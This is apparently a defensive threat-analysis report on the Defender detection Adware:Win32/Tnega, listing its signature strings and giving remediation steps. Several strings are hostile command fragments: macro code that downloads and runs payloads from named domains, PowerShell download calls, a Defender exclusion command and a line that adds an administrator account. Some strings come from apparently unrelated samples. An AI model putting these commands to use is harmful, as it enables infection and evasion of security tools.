$ analyze-threat Adware:Win32/Tnega
Adware:Win32/Tnega - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Adware:Win32/Tnega
Classification:
Type: Adware
Platform: Win32
Family: Tnega
Detection Type: Concrete (known malware family with identified signatures)
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: Adware - Displays unwanted advertisements for 32-bit Windows platform, family Tnega

Summary:

Adware:Win32/Tnega is a concrete detection indicating a persistent adware threat. It uses scripting capabilities, likely delivered through malicious documents, to download additional components from external domains and establishes persistence by dropping files such as 'wsdts.db' or 'onenote.db' into user AppData directories. Once installed, it displays unwanted advertisements, may alter system settings, and collects user information.

Severity: High
VDM Static Detection:
Relevant strings associated with this threat:
 - https://cdn.jsd (PEHSTR_EXT)
 - gh/i87924hgHd (PEHSTR_EXT)
 - y/bboxfu<', 'that3.e (PEHSTR_EXT)
 - CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - //smartscreentestratings2.net/ (MACROHSTR_EXT)
 - .exe (MACROHSTR_EXT)
 - https: (MACROHSTR_EXT)
 - .Run CreateObject("Scripting.FileSystemObject"). (MACROHSTR_EXT)
 - .exe" (MACROHSTR_EXT)
 - CreateObject("Scripting.FileSystemObject").FileExists(szFile) (MACROHSTR_EXT)
 - Set oNode = oXML.CreateElement("base64") (MACROHSTR_EXT)
 - = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice (MACROHSTR_EXT)
 - dllPath = workDir & "\" & binName (MACROHSTR_EXT)
 - binName = "wsdts.db (MACROHSTR_EXT)
 - = ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - = curDocName & " .docx" (MACROHSTR_EXT)
 - workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\OneNote" (MACROHSTR_EXT)
 - dllPath = workDir & "\onenote.db" (MACROHSTR_EXT)
 - Dm = "http://craghoppers.icu/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Dm = "http://moveis-schuster-com.ga/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Set xmlHttp = CreateObject(VB) (MACROHSTR_EXT)
 - .Open "get", strURL (MACROHSTR_EXT)
 - + "objShell.Run Base64Decode(" (MACROHSTR_EXT)
 - = "C:\Windows\System32\w" + "script" + ".exe " (MACROHSTR_EXT)
 - "WScript." + "She" + "ll" (MACROHSTR_EXT)
 - + "." + "v" (MACROHSTR_EXT)
 - GetDllName = "C:\ProgramData\desktop.dat" (MACROHSTR_EXT)
 - .CreateElement("base64") (MACROHSTR_EXT)
 - ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - , ".") - 1) (MACROHSTR_EXT)
 - CreateObject("Word.Application") (MACROHSTR_EXT)
 - viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - autologon.exe !viebobpspa EU odeA5SvxTzsDa7kwqDq6K6Xr8Bukha -accepteula (PEHSTR_EXT)
 - net localgroup administrators eu\!viebobpspa /add (PEHSTR_EXT)
 - C:\TEMP\2890.tmp\viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - System.Runtime.InteropServices (PEHSTR_EXT)
 - System.Runtime.CompilerServices (PEHSTR_EXT)
 - System.Resources (PEHSTR_EXT)
 - CowsAndBulls.GameForm.resources (PEHSTR_EXT)
 - CowsAndBulls.HighScoresForm.resources (PEHSTR_EXT)
 - CowsAndBulls.MainMenuForm.resources (PEHSTR_EXT)
 - CowsAndBulls.Properties.Resources.resources (PEHSTR_EXT)
 - cmd.exe /c powershell.exe -windowstyle hidden Sleep 5 (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - TOKEN_STEALER_CREATOR.Properties (PEHSTR_EXT)
 - ItroublveTSC\bin_copy\obj\Debug (PEHSTR_EXT)
 - 4S;/M (SNID)
 - ApplyRequest.dll (PEHSTR)
 - ScriptDDL (PEHSTR)
 - _lstStatusExec (PEHSTR)
 - _reqScript (PEHSTR)
 - ExecuteAllSteps (PEHSTR)
 - SendProgressExec (PEHSTR)
 - GerarScriptsDrop (PEHSTR)
 - GetListReplaceDll (PEHSTR)
 - lblcomputadorresponsavel (PEHSTR)
 - DgFqNyZD2NcjS7p60JGMch18mc8g (PEHSTR_EXT)
 - RESUTILS.dll (PEHSTR)
 - RPCRT4.dll (PEHSTR)
 - wsnmp32.dll (PEHSTR)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR)
 - sqlite3.dll (PEHSTR)
 - /C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR)
 - _acmdln (PEHSTR)
 - __p__commode (PEHSTR)
 - /uke3 (SNID)
 - 99`\, (SNID)
 - TankGame.My.Resources (PEHSTR_EXT)
 - TankGame.Game.resources (PEHSTR_EXT)
 - TankGame.MainForm.resources (PEHSTR_EXT)
 - TankGame.StartUp.resources (PEHSTR_EXT)
 - TankGame.Resources.resources (PEHSTR_EXT)
 - TankGame.MultipleBlocks.resources (PEHSTR_EXT)
 - TankGame.InGameOptions.resources (PEHSTR_EXT)
 - TankGame.QuickStart.resources (PEHSTR_EXT)
 - C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR_EXT)
 - SOFTWARE\Borland\Delphi\CPM (PEHSTR_EXT)
 - _acmdln (PEHSTR_EXT)
 - __p__commode (PEHSTR_EXT)
 - sqlite3.dll (PEHSTR_EXT)
 - \VersionIndependentProgID (PEHSTR_EXT)
 - DefenderCSP.dll (PEHSTR_EXT)
 - 3yD`. (SNID)
 - bcrypt.dll (PEHSTR_EXT)
 - zeeLog.txt (PEHSTR_EXT)
 - Interfaces.ShellExtension.JumpList (PEHSTR_EXT)
 - file.dat (PEHSTR_EXT)
 - ShellExecuteW (PEHSTR_EXT)
 - Task24Main.pdb (PEHSTR_EXT)
 - HttpWebResponse (PEHSTR_EXT)
 - CellManager.g.resources (PEHSTR_EXT)
 - CellManager.exe (PEHSTR_EXT)
 - aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
 - XRails.Controls (PEHSTR_EXT)
 - TwiceSlicePanel.UI (PEHSTR_EXT)
 - Client.Connection (PEHSTR_EXT)
 - \7AAAAAAAAAAAAAA (PEHSTR_EXT)
 - ppphhyf.exe (PEHSTR_EXT)
 - dKO:. (SNID)
 - Oc\p! (SNID)
 - powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath (PEHSTR_EXT)
 - report_error.php?key=125478824515ADNxu2ccbwe&msg=No-Exes-Found-To-Run (PEHSTR_EXT)
 - http://sornx.xyz (PEHSTR_EXT)
 - myip.php (PEHSTR_EXT)
 - addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - Cadave.pdb (PEHSTR_EXT)
 - Top1Mu.Net (PEHSTR_EXT)
 - Data/Logo/System.pro (PEHSTR_EXT)
 - Release\Main.pdb (PEHSTR_EXT)
 - OhTTij5lmnomlkjst\Xuh (PEHSTR_EXT)
 - $I3\$ (PEHSTR_EXT)
 - \payloaddll\Release\cmd.pdb (PEHSTR_EXT)
 - ME_ADAudit.exe (PEHSTR_EXT)
 - https://cdn.discordapp.com/attachments/895494963515772931/895591057251762186/test_2.dll (PEHSTR_EXT)
 - D:\OneDrive\Projects\OneDriveTimer\OneDriveTimerUI\obj\Release\OneDriveTimerUI.pdb (PEHSTR_EXT)
 - OneDriveTimerUI.Properties.Resources (PEHSTR_EXT)
 - CenterToScreen (PEHSTR_EXT)
 - SetThreadExecutionState (PEHSTR_EXT)
 - @Uj/<[]t (SNID)
 - MtgKERNEL32.dll (PEHSTR_EXT)
 - DonWS2_32.dll (PEHSTR_EXT)
 - Zu8K{. (SNID)
 - www.Yanjie.com (PEHSTR_EXT)
 - http://101.35.18.254/444.exe (PEHSTR_EXT)
 - \111.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - C:\ProgramData\444.exe (PEHSTR_EXT)
 - ShellExecute (PEHSTR_EXT)
 - D$,lExe (PEHSTR_EXT)
 - q</2nK*>De!'7p/V (PEHSTR_EXT)
 - JoinDomain.exe (PEHSTR_EXT)
 - Software\ASProtect\Key (PEHSTR_EXT)
 - aspr_keys.ini (PEHSTR_EXT)
 - WkBycm9qZ2VxbGloSWZlbVQlKlFdbn5/ZGJgUyMvHRpKIzwnJTN2YXx5cjYnJDYpLkQ2OkBaeHF0c3dta21BVE5Tfww= (PEHSTR_EXT)
 - powershell wget https://bit.ly/3uNrtcg -O pin.txt (PEHSTR_EXT)
 - DownloadString('https://bit.ly/3uLJ706') (PEHSTR_EXT)
 - /home/keith/builds/mingw/gcc-9.2.0-mingw32-cross-native/mingw32/libgcc (PEHSTR_EXT)
 - 3<$1<$3<$\ (PEHSTR_EXT)
 - Dr4Zaap3qgP4pRB4NWbs9NQuRWalMrMG1AUda1mSG6I5n7u1nNriGo3RF0+Z/lfgeMNzjv46nK1VAIz9QXZ+VfgNxpd (PEHSTR_EXT)
 - tOH82ARnxdnufgODepMgEFCePdFSF4aj26l6HYbXlsnhvCh/NaRIPs+LM/BZtNDSNWyzOq2I4Xdho6ao= (PEHSTR_EXT)
 - +n51hDmYO9yaWP1yiFGAdu/cEvP8ojbpxBqFHzn7xvH (PEHSTR_EXT)
 - InitializeComponent (PEHSTR_EXT)
 - quanlykho.Properties (PEHSTR_EXT)
 - <Y\k` (SNID)
 - ogd368hc.dll (PEHSTR_EXT)
 - My.MyProject.Forms (PEHSTR)
 - C:\workspace\mudfix\attach\screen_block\general\obj\Release\general.pdb (PEHSTR_EXT)
 - wmiccomputersystemgetmodelFailed (PEHSTR_EXT)
 - http://xianggrhen.com/composure/ (PEHSTR_EXT)
 - FileManager.Form01.resources (PEHSTR_EXT)
 - CSVProject.Properties (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware associated with this threat:
Filename: caaservices.exe
SHA-256: f0eff94e8ed95c8ccb19decb14f7edcf036830502745ec47fd64152e8b6e42b9
Date: 31/01/2026
Remediation Steps:
Isolate the infected system immediately. Perform a full scan with updated antivirus software to remove all detected threat components. Manually verify and remove any dropped files in user AppData directories and persistence mechanisms. Block associated malicious URLs at the network perimeter.
=== END REPORT ===